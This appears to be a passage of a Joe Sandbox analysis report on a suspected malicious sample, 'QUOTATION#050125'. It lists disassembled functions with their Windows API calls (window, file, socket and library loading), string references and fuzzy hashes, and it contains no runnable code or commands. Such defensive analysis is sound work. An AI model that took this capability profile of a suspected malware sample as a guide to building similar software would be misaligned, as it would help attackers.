Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 1e88d22bbdacd95d82ad5024cf4ae31b9e82a498b87c31778b30955a93c3ee8e
Instruction ID: 7a50419a9adf8c1542dcf144995a79e9622deaad4e888a30bc87f648414e5eaf
Opcode Fuzzy Hash: 1e88d22bbdacd95d82ad5024cf4ae31b9e82a498b87c31778b30955a93c3ee8e
Instruction Fuzzy Hash: 1F414E72900218BFDB10DFA5CD42AEEBBB8EF09304F00409AFA55B7181DB756E45CBA5

Function 004EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004EC306
DeleteMenu.USER32(?,00000007,00000000), ref: 004EC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00551990,0179ACE8), ref: 004EC395

Strings

0, xrefs: 004EC2DF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: c1923851adb39ff62d1c6c2ea5215039b7daffe6ade1ef3dd4ddcc522b19c241
Instruction ID: b5d579b75924ff6f701daadc3872dfe59f79bcb2b310f07a9697fefbaed51b1b
Opcode Fuzzy Hash: c1923851adb39ff62d1c6c2ea5215039b7daffe6ade1ef3dd4ddcc522b19c241
Instruction Fuzzy Hash: D641AF312043819FD720DF26D884F5BBBA4AF85315F048A5EFC65972D1C738A805CB6A

Function 004ECF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004ECF22,?), ref: 004EDDFD

Part of subcall function 004EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004ECF22,?), ref: 004EDE16

lstrcmpiW.KERNEL32(?,?), ref: 004ECF45
MoveFileW.KERNEL32(?,?), ref: 004ECF7F
SHFileOperationW.SHELL32(?), ref: 004ED061

Strings

\*.*, xrefs: 004ECFF3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileFullNamePath$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 67141772-1173974218
Opcode ID: fe91fa7a1b18505307944338430c76422efc29c27b3205dbf29abc2b00d7e42c
Instruction ID: cc058c8fb233b09aed57a5b8efc110aeaa5ec51d338a0873e823402ca7f1ff05
Opcode Fuzzy Hash: fe91fa7a1b18505307944338430c76422efc29c27b3205dbf29abc2b00d7e42c
Instruction Fuzzy Hash: F5419671C452585FDF12EBA1CD81EDEB7B8AF18385F0000EBE545EB141EB39AA89CB14

Function 00514416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0051CC08,00000000,?,?,?,?), ref: 005144AA
GetWindowLongW.USER32 ref: 005144C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005144D7

Strings

SysTreeView32, xrefs: 0051447C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 00d233050d360e49cd2a0eb6183fb54eef0c978315cc22f6312c2828315ca843
Instruction ID: eb6accc99ec40f04161361cc92bd3d6c72fc5e0f8bffcf04d0d1dba2355f9e71
Opcode Fuzzy Hash: 00d233050d360e49cd2a0eb6183fb54eef0c978315cc22f6312c2828315ca843
Instruction Fuzzy Hash: 80319C31200205ABEF209F38DC45BEA7FA9FB08328F215729F975921D0D7B5AC909B50

Function 004E6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 004E6EED
VariantCopyInd.OLEAUT32(?,?), ref: 004E6F08
VariantClear.OLEAUT32(?), ref: 004E6F12

Strings

*jN, xrefs: 004E6E8B, 004E6E90, 004E6EF8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jN
API String ID: 2173805711-3303929246
Opcode ID: 9a09f6d352a680ca4d1963c9bb2679eaae7e195fd9b34690c85fb9bee65d5aa9
Instruction ID: 48afda16d61001cbba08fb6c7bbb1b7ddae41302e038315c77109c9bc5a24195
Opcode Fuzzy Hash: 9a09f6d352a680ca4d1963c9bb2679eaae7e195fd9b34690c85fb9bee65d5aa9
Instruction Fuzzy Hash: AC31C171704285DFCB04AF66E8508BE3775FF61389F1108AAF8064B2A1CB389912DBD9

Function 00513EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00513F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00513F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00513F78

Strings

SysMonthCal32, xrefs: 00513F0B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: eddb90b8a87f739fbc26c8fd5a3b5047b41fcc32ccd0bc9897f507a0aa05efdf
Instruction ID: 4a13689aaff757b382acc4c9c6540c24b3a40d6de73d8ab41c325860a6aa6812
Opcode Fuzzy Hash: eddb90b8a87f739fbc26c8fd5a3b5047b41fcc32ccd0bc9897f507a0aa05efdf
Instruction Fuzzy Hash: A921BF32600219BFEF219F54CC56FEA3F79FB48718F110214FA156B1D0D6B5A895DB90

Function 00514653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00514705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00514713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0051471A

Strings

msctls_updown32, xrefs: 00514684

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f872fcc8e19464f7dd48b9d0a4c370841cc058e10efc8e0059009efe09db1a21
Instruction ID: bf55c0927cbc5a042d318ac79bba004dadc95c2862a716476cc76d5df99d5296
Opcode Fuzzy Hash: f872fcc8e19464f7dd48b9d0a4c370841cc058e10efc8e0059009efe09db1a21
Instruction Fuzzy Hash: 812192B5600208AFEB10DF64DCD1DB73BADFB5A758B000449F6009B291CB71EC51DB60

Function 005137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00513840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00513850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00513876

Strings

Listbox, xrefs: 0051380F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 70a4029b570b6fdc45307fb58d49d30e3f292cd4c9535541364ac81a1c287807
Instruction ID: ce5f254fc2aea430081ffdf5d21a98de2293e70497865c366589a1b6fd24db8b
Opcode Fuzzy Hash: 70a4029b570b6fdc45307fb58d49d30e3f292cd4c9535541364ac81a1c287807
Instruction Fuzzy Hash: E921AC72600218BBEF219F64CC95EFB3B6EFF89754F108124F9009B190C6729D9287A0

Function 004F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004F4A5C
SetErrorMode.KERNEL32(00000000,?,?,0051CC08), ref: 004F4AD0

Strings

%lu, xrefs: 004F4A6F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 4aa5916d26e4623027a151dfb0da7355e756a8b5bf8beda8a9333098ccd2b08d
Instruction ID: e438fb44522f4a7d2aa09bf8d8eaa028ddf96ef08d8b64083d752791425cb083
Opcode Fuzzy Hash: 4aa5916d26e4623027a151dfb0da7355e756a8b5bf8beda8a9333098ccd2b08d
Instruction Fuzzy Hash: FD318E74A40208AFDB10DF54C885EAE7BF8EF48308F1480AAE909DB352DB75ED45CB65

Function 005141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0051424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00514264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00514271

Strings

msctls_trackbar32, xrefs: 00514226

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 4560b32f2a5dc05ee35ecdf68f48c8ad14aa5bce85dccbbb83bba67d648c5aed
Instruction ID: 5080fddc433437a733b8d782b641d5651c7f9fa9e08308e4b3c71c49fbc85737
Opcode Fuzzy Hash: 4560b32f2a5dc05ee35ecdf68f48c8ad14aa5bce85dccbbb83bba67d648c5aed
Instruction Fuzzy Hash: 34119131240248BEFF205E69CC06FEB3BACFB95B54F110514FA55E6090D671DC919B14

Function 004E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004E2DC5
Part of subcall function 004E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E2DD6
Part of subcall function 004E2DA7: GetCurrentThreadId.KERNEL32 ref: 004E2DDD
Part of subcall function 004E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004E2DE4

GetFocus.USER32 ref: 004E2F78

Part of subcall function 004E2DEE: GetParent.USER32(00000000), ref: 004E2DF9

GetClassNameW.USER32(?,?,00000100), ref: 004E2FC3
EnumChildWindows.USER32(?,004E303B), ref: 004E2FEB

Strings

%s%d, xrefs: 004E2FFF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
String ID: %s%d
API String ID: 2776554818-1110647743
Opcode ID: dfd3ff99ad64fde8b2cb2b1b083f14e1da0ae275823cd93bf784d8290b6382d9
Instruction ID: 8bc9b45cd7f9deeda61f3889d35c7786341739a0adef63e275f5eb0937cecb0b
Opcode Fuzzy Hash: dfd3ff99ad64fde8b2cb2b1b083f14e1da0ae275823cd93bf784d8290b6382d9
Instruction Fuzzy Hash: 37113D7160024467CF41BF768C89EEE376AAF94309F00407AFA0997142DE745909CB74

Function 00515882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005158C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005158EE
DrawMenuBar.USER32(?), ref: 005158FD

Strings

0, xrefs: 0051588F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 70d625c0c4e7601f554283106f874ce414d78ac7350b261c01984d02a0a46431
Instruction ID: cbd682caf03fe5ab90dd8ddf8b47146a019602e4b6467da13a5c728b5aa87e26
Opcode Fuzzy Hash: 70d625c0c4e7601f554283106f874ce414d78ac7350b261c01984d02a0a46431
Instruction Fuzzy Hash: 67013C31500218EFEF219F11D844BEABFB9BB85360F1080A9E849D6151EB308A84EF21

Function 004DD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004DD3BF
FreeLibrary.KERNEL32 ref: 004DD3E5

Strings

GetSystemWow64DirectoryW, xrefs: 004DD3B9
X64, xrefs: 004DD2A8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 6a7d552c8c848ead40977fa6b8ea3ab43a6fd68ac41ca5e2ccb588b0e5382f7c
Instruction ID: df4cf6657b50c8eb1ccce717158ef13206b753f42e9ac79113c21214e9e91862
Opcode Fuzzy Hash: 6a7d552c8c848ead40977fa6b8ea3ab43a6fd68ac41ca5e2ccb588b0e5382f7c
Instruction Fuzzy Hash: 6DF02021CC1A20AAEB3106108C34EAA3E24AF11741B5985ABE802E5308D72CCC89829E

Function 004E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d4674eb5db2818b7ed797fb0464c0665807e5a7ea9e909d8bbd77fe1489ca6
Instruction ID: 28496f9919881d4bb617a847a8e08e12262e1e9eb282bb5133640a6ef761cf25
Opcode Fuzzy Hash: b0d4674eb5db2818b7ed797fb0464c0665807e5a7ea9e909d8bbd77fe1489ca6
Instruction Fuzzy Hash: 8BC19C35A0024AEFCB04CFA5C884EAEB7B5FF48305F208599E915EB251C775ED82CB94

Function 0050342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00503459
CoUninitialize.OLE32 ref: 00503463
VariantInit.OLEAUT32(?), ref: 0050346E
VariantClear.OLEAUT32(?), ref: 0050371B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 940e1519621ed844ccb10bab9064b8783801a59fb7e7fd6b11e6bdb58800cd3e
Instruction ID: 051bdc0e0c3dc0153dddcfad9ed7244aa20a184799f26b194d89994da29d6fb6
Opcode Fuzzy Hash: 940e1519621ed844ccb10bab9064b8783801a59fb7e7fd6b11e6bdb58800cd3e
Instruction Fuzzy Hash: 53A14C75204200AFC700EF25C495A2EBBE9FF88718F14885EF94A9B3A2DB35ED05CB55

Function 00516278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0179F7F8,?), ref: 005162E2
ScreenToClient.USER32(?,?), ref: 00516315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00516382

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 03b892997b9bedf07ae411901c567e6d978aff07ae4134d5d27c7650cb03cef0
Instruction ID: 22ae77c1585a588372057c73f046de43b483c906de4d095d7c03b68a73e72cb2
Opcode Fuzzy Hash: 03b892997b9bedf07ae411901c567e6d978aff07ae4134d5d27c7650cb03cef0
Instruction Fuzzy Hash: 41510A74A00209AFEF10DF68D880AEE7FB5FB55360F108559F9259B290D771ED81DB50

Function 00501AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00501AFD
WSAGetLastError.WSOCK32 ref: 00501B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00501B8A
WSAGetLastError.WSOCK32 ref: 00501B94

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: ae383c2a9fb97b80dc63018f70f04ea5588d64259f9f24ea8327f9f656007ce4
Instruction ID: f04e8a6c9dfc76cff8817fa5c1aaf7904e0afd1928d0dbd82630f97cd384f374
Opcode Fuzzy Hash: ae383c2a9fb97b80dc63018f70f04ea5588d64259f9f24ea8327f9f656007ce4
Instruction Fuzzy Hash: 9941EF34640200AFE720AF25C886F2A7BE5AB44708F54C49DFA1A8F7D2D776ED418B95

Function 004F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004F5783
GetLastError.KERNEL32(?,00000000), ref: 004F57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004F57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004F57FA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b4409c7f171621fd829e50594a156d2009ed9eeaa59c03da1fcd525f9a163bb3
Instruction ID: 98ec35a9a09a91a102a0b63221f97f58a91ad26e412e4863752864ecfd0b1207
Opcode Fuzzy Hash: b4409c7f171621fd829e50594a156d2009ed9eeaa59c03da1fcd525f9a163bb3
Instruction Fuzzy Hash: 1B413C39200610DFCB10EF16C444A5EBBE1EF49368B18C889EA5A5B762CB39FD40CB95

Function 005152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00515352
GetWindowLongW.USER32(?,000000F0), ref: 00515375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00515382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005153A8

Memory Dump Source

